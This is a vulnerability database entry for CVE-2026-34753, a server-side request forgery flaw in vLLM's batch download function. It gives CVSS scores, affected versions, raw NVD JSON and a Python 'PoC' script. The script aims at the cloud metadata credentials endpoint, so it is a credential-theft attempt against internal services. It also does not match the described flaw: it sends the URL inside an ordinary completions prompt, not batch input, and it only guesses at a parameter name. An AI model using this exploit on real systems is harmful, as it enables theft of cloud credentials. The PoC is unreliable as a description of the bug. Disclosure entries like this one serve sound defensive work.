Security Vulnerability Report
中文
CVE-2026-34753 CVSS 5.4 MEDIUM

CVE-2026-34753

Published: 2026-04-06 16:16:36
Last Modified: 2026-04-20 18:31:57
Source: [email protected]

Description

vLLM is an inference and serving engine for large language models (LLMs). From 0.16.0 to before 0.19.0, a server-side request forgery (SSRF) vulnerability in download_bytes_from_url allows any actor who can control batch input JSON to make the vLLM batch runner issue arbitrary HTTP/HTTPS requests from the server, without any URL validation or domain restrictions. This can be used to target internal services (e.g. cloud metadata endpoints or internal HTTP APIs) reachable from the vLLM host. This vulnerability is fixed in 0.19.0.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* - VULNERABLE
vLLM >= 0.16.0
vLLM < 0.19.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target vLLM server endpoint url = "http://vllm-server:8000/v1/completions" # Malicious URL targeting internal metadata service (e.g., AWS IMDS) internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" # Construct the malicious JSON payload # This payload injects the SSRF URL into the batch input payload = { "model": "vllm-model", "prompt": "Read the content from: " + internal_target, "max_tokens": 50 } # Example if the vulnerability is triggered via a specific download parameter # payload = { # "download_url": internal_target # } try: # Send the request to trigger the SSRF response = requests.post(url, json=payload) if response.status_code == 200: print("[+] Potential SSRF triggered successfully.") print("[+] Server Response:") print(response.text) else: print("[-] Request failed with status code:", response.status_code) print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34753", "sourceIdentifier": "[email protected]", "published": "2026-04-06T16:16:36.307", "lastModified": "2026-04-20T18:31:56.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From 0.16.0 to before 0.19.0, a server-side request forgery (SSRF) vulnerability in download_bytes_from_url allows any actor who can control batch input JSON to make the vLLM batch runner issue arbitrary HTTP/HTTPS requests from the server, without any URL validation or domain restrictions.\nThis can be used to target internal services (e.g. cloud metadata endpoints or internal HTTP APIs) reachable from the vLLM host. This vulnerability is fixed in 0.19.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.16.0", "versionEndExcluding": "0.19.0", "matchCriteriaId": "B8669DB6-DED0-403B-A294-BBF70600B90F"}]}]}], "references": [{"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-pf3h-qjgv-vcpr", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.